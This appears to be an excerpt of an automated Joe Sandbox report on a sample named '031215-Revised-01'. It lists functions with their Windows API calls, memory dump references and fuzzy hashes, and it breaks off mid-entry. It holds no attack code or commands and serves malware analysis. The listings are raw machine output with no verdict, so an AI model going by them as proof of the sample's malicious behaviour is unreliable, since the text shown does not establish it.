                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        • String ID:
                                        • API String ID: 4136290138-0
                                        • Opcode ID: 636d51005dcdcc7afad763a40e0b31d6eee2ac79be47965212397f4167ea0c4f
                                        • Instruction ID: 2ac94df20dcaf4272a640834c023d364071385f883e65ee621f330865ec4b302
                                        • Opcode Fuzzy Hash: 636d51005dcdcc7afad763a40e0b31d6eee2ac79be47965212397f4167ea0c4f
                                        • Instruction Fuzzy Hash: B35159B5A00219EFCB14CF68C894AAAB7F9FF89310F15855AE945DB350E730E911CFA0
                                        Function 000E8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000E8BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000E8BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000E8C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000E8C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000E8C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: 39730ff4a9fa45130fe6be8c456da2e07846558e439c40f0f32cfd4188f48fb4
                                        • Instruction ID: fa7bc9e81a3ebe72a0198b61957cf954a881f25fa46466e166eec6671cdc4b98
                                        • Opcode Fuzzy Hash: 39730ff4a9fa45130fe6be8c456da2e07846558e439c40f0f32cfd4188f48fb4
                                        • Instruction Fuzzy Hash: C4514735A00619AFCB04DF65C881AA9BBF1FF49314F18C058E84DAB362CB75ED41CB90
                                        Function 000F8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000F8F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000F8FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 000F8FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000F9032
                                        • FreeLibrary.KERNEL32(00000000), ref: 000F9052
                                          • Part of subcall function 0008F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000E1043,?,753CE610), ref: 0008F6E6
                                          • Part of subcall function 0008F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000CFA64,00000000,00000000,?,?,000E1043,?,753CE610,?,000CFA64), ref: 0008F70D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        • String ID:
                                        • API String ID: 666041331-0
                                        • Opcode ID: 4f21e4ae96651676e283d9c0397ed5c4c8e6576bfbfe68ee69881129417ad435
                                        • Instruction ID: f204d7daf7ac5b7c94331093a9357c8ce91216b996a3585541b261fa268f8f31
                                        • Opcode Fuzzy Hash: 4f21e4ae96651676e283d9c0397ed5c4c8e6576bfbfe68ee69881129417ad435
                                        • Instruction Fuzzy Hash: 98512634A00209DFC715DF68C4849EDBBF1FF49314B0881A8E94A9BB62DB35ED85CB91
                                        Function 00106B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00106C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00106C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00106C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000EAB79,00000000,00000000), ref: 00106C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00106CC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        • String ID:
                                        • API String ID: 3688381893-0
                                        • Opcode ID: e2f64ada596c446456a003b23c06c00551c0561f5434a534e773a0aedb944ba1
                                        • Instruction ID: 4f6c9ad797f758c4fd0cbffe84ee8c58cd3c6866c8fcfd2344a1a06653af6fe0
                                        • Opcode Fuzzy Hash: e2f64ada596c446456a003b23c06c00551c0561f5434a534e773a0aedb944ba1
                                        • Instruction Fuzzy Hash: 2F41B735604104AFE724CF28CE54FA97BA5EB0A350F150268F9D9A72E0C7B1AD61DA90
                                        Function 000A2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 72dce0f596a8724928a3ed7ff139a5ddb78b51c892792c0f12e7f87bdd1ae626
                                        • Instruction ID: 9f9ab50b140449c34b6a21e15609898530abdb97b5caec2deca5f10b2fda2681
                                        • Opcode Fuzzy Hash: 72dce0f596a8724928a3ed7ff139a5ddb78b51c892792c0f12e7f87bdd1ae626
                                        • Instruction Fuzzy Hash: CA41B276A002009FCB24DFBCC981A9EB7E5EF8A714F154579E615EB352DB31AD01CB81
                                        Function 0008912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00089141
                                        • ScreenToClient.USER32(00000000,?), ref: 0008915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00089183
                                        • GetAsyncKeyState.USER32(00000002), ref: 0008919D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 8d403db89f550c8ae188a15ac17300eabb8872f019712956ad311a9276c6e380
                                        • Instruction ID: d08962166baa974f5117cda8d89952a5528cd635dad1c9e60a8e2800edbe2855
                                        • Opcode Fuzzy Hash: 8d403db89f550c8ae188a15ac17300eabb8872f019712956ad311a9276c6e380
                                        • Instruction Fuzzy Hash: 8D414031A0851AFBDF55AF68C848BFEB7B4FB05324F244219E869A72D0C7745950CF91
                                        Function 000E3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 000E38CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000E3922
                                        • TranslateMessage.USER32(?), ref: 000E394B
                                        • DispatchMessageW.USER32(?), ref: 000E3955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000E3966
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: f12f593ca98116972ba0431bb1894febc8325fc01739a921163c2f4c0cb9f5e4
                                        • Instruction ID: 49cfe312e8279fdcdab6ea275d49c593d29778bb2c54c4fabcab8bfa783a76c6
                                        • Opcode Fuzzy Hash: f12f593ca98116972ba0431bb1894febc8325fc01739a921163c2f4c0cb9f5e4
                                        • Instruction Fuzzy Hash: 7D31B6745043C2AEEB75CB36D84DBB67FE8AB06304F040559E456A34A2D7F496C5CB21
                                        Function 000ECF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 000ECF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 000ECF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 3191363074-0
                                        • Opcode ID: b1d972b4be2aae00e4b5de66b16a0b2cc616862799a0ad8187a51abda6bf14ab
                                        • Instruction ID: 4fb20a89433691e32eef45b67b1f513e09c07bc588ffd4ca6afd97f8d2cf0b24
                                        • Opcode Fuzzy Hash: b1d972b4be2aae00e4b5de66b16a0b2cc616862799a0ad8187a51abda6bf14ab
                                        • Instruction Fuzzy Hash: 75316B71600245AFEB20DFA6C884EAFBBF9FB14311B10443EF546E2501DB31AE42DBA0
                                        Function 000D1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 000D1915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 000D19C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 000D19C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 000D19DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000D19E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 6b999aefbb66360a4fce509cc6a9277aeb0e5bb73711c4e6e1b1fccfb3ff3b1e
                                        • Instruction ID: 4dbe5b35088740a519f6d45962ce177743816ef5eb55f57f6a815579e5110471
                                        • Opcode Fuzzy Hash: 6b999aefbb66360a4fce509cc6a9277aeb0e5bb73711c4e6e1b1fccfb3ff3b1e
                                        • Instruction Fuzzy Hash: 7031B171900219EFCB10CFA8CDA9ADE7BB5EB04315F10432AF961A72D1C7B09D44CBA0
                                        Function 00105706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00105745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0010579D
                                        • _wcslen.LIBCMT ref: 001057AF
                                        • _wcslen.LIBCMT ref: 001057BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00105816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: 2c6445a622eebce5c5835d6e813b70bbcc501f34d3d11b667b4c90ed5b2285ea
                                        • Instruction ID: 87f757a3115cd6867350a5b7311cb00af4cb88d35c063361f1ce7a0c5de07b23
                                        • Opcode Fuzzy Hash: 2c6445a622eebce5c5835d6e813b70bbcc501f34d3d11b667b4c90ed5b2285ea
                                        • Instruction Fuzzy Hash: C8218275904618AADF209FA0CC85AEE7BBDFF44724F108216E969EA1C1E7B099C5CF50
                                        Function 000F0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 000F0951
                                        • GetForegroundWindow.USER32 ref: 000F0968
                                        • GetDC.USER32(00000000), ref: 000F09A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 000F09B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 000F09E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 1cce22b257bf0bb69f2d033e33de1487d5d70d5fa1ffedad781a3d38dd16dada
                                        • Instruction ID: 26da8e841f7509fc0b61f657b485bb5bc32882712eeb8c458d78c6c68659e420
                                        • Opcode Fuzzy Hash: 1cce22b257bf0bb69f2d033e33de1487d5d70d5fa1ffedad781a3d38dd16dada
                                        • Instruction Fuzzy Hash: 42218135A00204AFD714EF65C885EAEBBE5EF48700F048168F94AA7762DB70AC44DF90
                                        Function 000ACDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 000ACDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000ACDE9
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000ACE0F
                                        • _free.LIBCMT ref: 000ACE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000ACE31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 4f1fb276d9d2b5675ab2dd45f8d1d898b908a221dbf416fc0625eb351275dd3d
                                        • Instruction ID: 266584f742c98cfa4d89739c77b6829dbeb22da1fa89dfb3a0ad731a06f63368
                                        • Opcode Fuzzy Hash: 4f1fb276d9d2b5675ab2dd45f8d1d898b908a221dbf416fc0625eb351275dd3d
                                        • Instruction Fuzzy Hash: 030184726012157F772157FA6C88DBF69ADEFC7BA13160229F905D7201EA718D0185F0
                                        Function 00089639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                        • SelectObject.GDI32(?,00000000), ref: 000896A2
                                        • BeginPath.GDI32(?), ref: 000896B9
                                        • SelectObject.GDI32(?,00000000), ref: 000896E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: cc1423c91313477afc4a125ab56556c7a4573f6bfdbbd34f79f2b7bbe6857bc3
                                        • Instruction ID: 83b9dfb2f167762d64bebbd0fd1f5a577627420bd53055b710e81bb73839c562
                                        • Opcode Fuzzy Hash: cc1423c91313477afc4a125ab56556c7a4573f6bfdbbd34f79f2b7bbe6857bc3
                                        • Instruction Fuzzy Hash: 28214F78802305FBDB11BF64DC14BBD3BA9BB51359F144216F4A4A65B0E3B059E1CF94
                                        Function 000D5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 9e23beb547d58e37eab86478899eb1c0a667c12ef6d2c4b5bf5aa3064a7096ee
                                        • Instruction ID: c1e0d53fb6e9d4e0f2d3ae72ea3dd69fac9a4a6d041b498cac3c8a1486d9fa4e
                                        • Opcode Fuzzy Hash: 9e23beb547d58e37eab86478899eb1c0a667c12ef6d2c4b5bf5aa3064a7096ee
                                        • Instruction Fuzzy Hash: 79019671749705FAE6285510AE43EFA739C9B21396B204026FD149A781F7A1EE1196B0
                                        Function 000A2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6), ref: 000A2DFD
                                        • _free.LIBCMT ref: 000A2E32
                                        • _free.LIBCMT ref: 000A2E59
                                        • SetLastError.KERNEL32(00000000,00071129), ref: 000A2E66
                                        • SetLastError.KERNEL32(00000000,00071129), ref: 000A2E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: b15e97fcd66fd9427c7555ed46dc8c1d4ed6a6ca71dcb8bb85d656a3e6c967d8
                                        • Instruction ID: 70adf8158df28f289b1d182508abe2d0a45f0b692532c8a4f34def934905f88e
                                        • Opcode Fuzzy Hash: b15e97fcd66fd9427c7555ed46dc8c1d4ed6a6ca71dcb8bb85d656a3e6c967d8
                                        • Instruction Fuzzy Hash: C801F4322056006BC622A7FD6C46EAF2699BBD37B1B214238F425E6293EB70CC814560
                                        Function 000D000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?,?,000D035E), ref: 000D002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?), ref: 000D0064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 8b556f54e4d2702cc82d70315bce2f9b0a4138119d03f0bc2cf3fcb809d55b92
                                        • Instruction ID: b51b930fdfd9f23df6ee0496dd0c90a9cf995c5e1389bfad6a6acec7950aa093
